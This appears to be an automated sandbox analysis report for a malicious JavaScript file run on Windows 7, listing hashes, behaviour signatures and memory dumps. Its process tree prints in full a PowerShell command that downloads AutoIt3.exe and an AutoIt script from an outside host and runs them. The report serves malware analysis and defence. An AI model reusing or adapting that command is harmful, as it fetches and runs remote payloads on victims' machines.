Analysis
-
max time kernel
118s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
08-11-2023 00:56
Static task
static1
Behavioral task
behavioral1
Sample
55610dd00539.js
Resource
win7-20231023-en
windows7-x64
4 signatures
150 seconds
General
-
Target
55610dd00539.js
-
Size
253KB
-
MD5
aeb8f1c6c921fbdde0e82cc6c16d911a
-
SHA1
7f04a7b709a9061dfbea8c0006b116e7639b04ca
-
SHA256
26421886a7d4d780f365d6531d6c945211a5a9d180ea1eda9cafdb8571323d62
-
SHA512
e1e441c59c482fe04bf4574d4c473d24a9003c2f57aac7464407827efc461a9b1b7ab11c0045e7a0cd54df7c63e8cfa40debc54e300164f558b85790b7938ad8
-
SSDEEP
6144:ae7hgXeerjqlI2Iro+4e7hgXeerjqlI2Iro+8:aIhgSlI23NIhgSlI23V
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2252 powershell.exe 2252 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2252 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 2772 wrote to memory of 2252 2772 wscript.exe powershell.exe PID 2772 wrote to memory of 2252 2772 wscript.exe powershell.exe PID 2772 wrote to memory of 2252 2772 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\55610dd00539.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://adfincolniclo.com:8443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://adfincolniclo.com:8443/msidevqdcds' -OutFile 'devqdcds.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'devqdcds.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2252-4-0x000000001B3E0000-0x000000001B6C2000-memory.dmpFilesize
2.9MB
-
memory/2252-6-0x0000000002360000-0x0000000002368000-memory.dmpFilesize
32KB
-
memory/2252-5-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/2252-8-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/2252-7-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/2252-9-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/2252-10-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/2252-11-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/2252-12-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/2252-13-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/2252-15-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/2252-14-0x0000000002990000-0x0000000002A10000-memory.dmpFilesize
512KB
-
memory/2252-16-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/2252-17-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB